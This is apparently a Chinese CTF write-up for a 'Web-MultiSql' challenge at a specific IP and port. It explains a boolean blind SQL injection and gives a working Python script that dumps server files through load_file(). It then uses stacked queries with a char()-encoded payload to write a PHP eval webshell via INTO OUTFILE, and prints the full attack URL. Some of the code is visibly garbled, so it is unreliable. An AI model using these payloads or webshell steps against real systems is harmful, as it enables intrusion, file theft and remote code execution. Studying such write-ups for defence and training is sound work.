

作者: liqijun    时间: 2020-10-7 18:07
标题: Web-MultiSql
http://62.234.99.204:1005/
`/user/user.php` 的 `id` 参数存在布尔盲注。利用 `id=1^x` 的异或：x 为 0 时实际查询 `id=1`，页面返回 admin 的用户信息；x 为 1 时查询 `id=0`，页面无数据。因此可用响应中是否出现 `admin` 作为真假判断依据。注意下面第一个 URL 里的 `if(...,1,0)` 与脚本里的 `if(...,0,1)` 真假取值相反，判断时不要混淆：
http://62.234.99.204:1005/user/user.php?id=1^if(ascii(mid(user(),1,1))>120,1,0)
http://62.234.99.204:1005/user/user.php?id=1^if(ascii(mid(load_file(0x2F7661722F7777772F68746D6C2F757365722F757365722E706870),1,1))=120,1,0)
用 `load_file()` 读取 `/var/www/html/user/user.php`，路径用 16 进制字面量（`0x...`）编码，避免在 URL 中出现引号。前提是数据库账号具有 FILE 权限且 `secure_file_priv` 未限制该路径，否则 `load_file()` 返回 NULL，所有位置都不会命中（脚本表现为一个字符也跑不出来）。
import multiprocessing
import time

import requests
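def runn(a, b, path='/var/www/html/user/user.php', needle='admin'):
    """Dump bytes of *path* from the target's MySQL server via boolean-based blind injection.

    The injection point is ``user.php?id=1^<cond>``.  The page renders the
    first user row (which contains ``admin``) when the XOR result is 1, i.e.
    when ``<cond>`` evaluates to 0, and renders nothing when it is 1.  For
    each position the loop asks "is byte ``pos`` equal to ``code``?" and
    treats the appearance of *needle* in the response as a yes.

    Args:
        a, b: half-open range of ``mid()`` positions to read.  MySQL ``mid()``
            is 1-indexed, so position 0 is skipped (the original spent a full
            sweep of requests on it for nothing).
        path: file handed to ``load_file()``.  It is hex-encoded so the payload
            needs no quote characters.  The target's MySQL user needs the FILE
            privilege and ``secure_file_priv`` must allow the path, otherwise
            ``load_file()`` is NULL and nothing ever matches.
        needle: marker that appears only on the "true" page.

    Returns:
        The recovered text.  A ``?`` marks a position where no candidate in
        0..127 matched (a byte >= 0x80, or ``load_file()`` returned NULL).
        Reading stops early when ``ascii(mid(...))`` is 0, which is what MySQL
        returns once ``mid()`` runs past the end of the file.

    The PHPSESSID below is the logged-in session at the time this was run; the
    page only reaches the vulnerable query with a valid session, so refresh it
    before reuse.
    """
    base = 'http://62.234.99.204:1005/user/user.php'
    headers = {'cookie': 'PHPSESSID=r5i6l86as0l78pn3qttjp9b8v3'}
    # load_file() takes a string; a 0x... hex literal keeps quotes out of the URL.
    hexpath = '0x' + path.encode().hex()
    session = requests.session()
    out = []
    for pos in range(max(a, 1), b):
        # 0..127 rather than 32..127: tabs and line breaks (9, 10, 13) are part
        # of the file too; the narrower range silently dropped every newline.
        for code in range(0, 128):
            url = '%s?id=1^if(ascii(mid(load_file(%s),%d,1))=%d,0,1)' % (base, hexpath, pos, code)
            if needle in session.get(url, headers=headers).text:
                break
        else:
            # No candidate matched: non-ASCII byte or load_file() returned NULL.
            out.append('?')
            print(''.join(out))
            continue
        if code == 0:
            # ascii('') == 0: mid() is past the end of the file, nothing left to read.
            break
        out.append(chr(code))
        print(''.join(out))
    return ''.join(out)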

if __name__ == '__main__':
    # Positions 0..9 of the target file only; widen the range for a full dump.
    runn(0, 10)

/var/www/html/user/user.php 内容如下（转贴时部分空白丢失，例如 `<?php` 与 `include_once`、`FROM` 与表名之间的空格，且源码在 `mysqli_close` 处被截断，阅读时注意）：
<?
phpinclude_once('../bwvs_config/sys_config.php');
  if (isset($_SESSION['user_name']))
  {
    include_once('../header.php');
    if (!isset($SESSION['user_id']))
    {
      $sql = "SELECT * FROMdwvs_user_message WHERE DWVS_user_name="."'{$_SESSION['user_name']}'";
      $data = mysqli_query($connect,$sql) ordie('Mysql Error!!');
      $result = mysqli_fetch_array($data);
      $_SESSION['user_id'] =$result['DWVS_user_id'];}
      $html_avatar =htmlspecialchars($_SESSION['user_favicon']);
      if(isset($_GET['id']))
      {
        $id=waf($_GET['id']);
        $sql = "SELECT * FROMdwvs_user_message WHERE DWVS_user_id =".$id;
        $data = mysqli_multi_query($connect,$sql) or die();
        $result =mysqli_store_result($connect);
        $row = mysqli_fetch_row($result);
        echo'<h1>user_id:'.$row[0]."</h1><br><h2>user_name:".$row[1]."</h2><br><h3>".$row[4]."</h3>";
        mysqli_free_result($result);die();
      }
     mysqli_close($connect);
`mysqli_multi_query()` 会执行以 `;` 分隔的多条 SQL 语句，所以 `id` 参数虽然经过了 `waf()`，仍可堆叠注入执行任意语句（下面用的 set / prepare / execute 就是靠它）。顺带一提题目代码本身还有别的问题：`$row[1]`、`$row[4]` 直接 echo 未做 `htmlspecialchars` 转义，`$_SESSION['user_name']` 直接拼进 SQL，`$SESSION['user_id']` 疑似少了下划线导致该分支恒成立——这些与本题解法无关，仅供参考。
使用 char() 绕过：把整条 `select ... into outfile` 语句编码成 `char(...)` 的数字列表，再用 `set @sql=...; prepare query from @sql; execute query;` 执行，这样 URL 中不出现引号和被过滤的关键字。`into outfile` 同样要求 FILE 权限、`secure_file_priv` 允许写该目录，并且 mysqld 进程对 `/var/www/html/favicon/` 有写权限。下面脚本用于生成 char() 列表：
strs='''select"<?php eval($_POST['a']);echo 'aaaaaaa'; ?>" into outfile'/var/www/html/favicon/TZDX.php';'''
print(strs)
len_str=len(strs)
for i inrange(0,len_str):
ifi == 0:
print('char(%s'%ord(strs),end="")
else:
print(',%s'%ord(strs),end="")
print(')')
注意 `$_POST['a']` 的 a 要加引号：不加引号时 PHP 会把 a 当作未定义常量处理（PHP 8 直接抛出 Error），写入的 webshell 连不上。

payload
set @sql=char(115,101,108,101,99,116,32,34,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,39,97,39,93,41,59,101,99,104,111,32,39,97,97,97,97,97,97,97,39,59,32,63,62,34,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,84,90,68,88,46,112,104,112,39,59);prepare query from @sql;execute query;
完整的 URL（`id=790` 应取一个不存在的 id，让第一条查询为空，后面堆叠的语句照常执行；按 /var/www/html 对应站点根目录推断，写入的 shell 地址为 http://62.234.99.204:1005/favicon/TZDX.php，用 POST 参数 a 传 PHP 代码）：
http://62.234.99.204:1005/user/user.php?id=790;set @sql=char(115,101,108,101,99,116,32,34,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,39,97,39,93,41,59,101,99,104,111,32,39,97,97,97,97,97,97,97,39,59,32,63,62,34,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,84,90,68,88,46,112,104,112,39,59);prepare query from @sql;execute query;





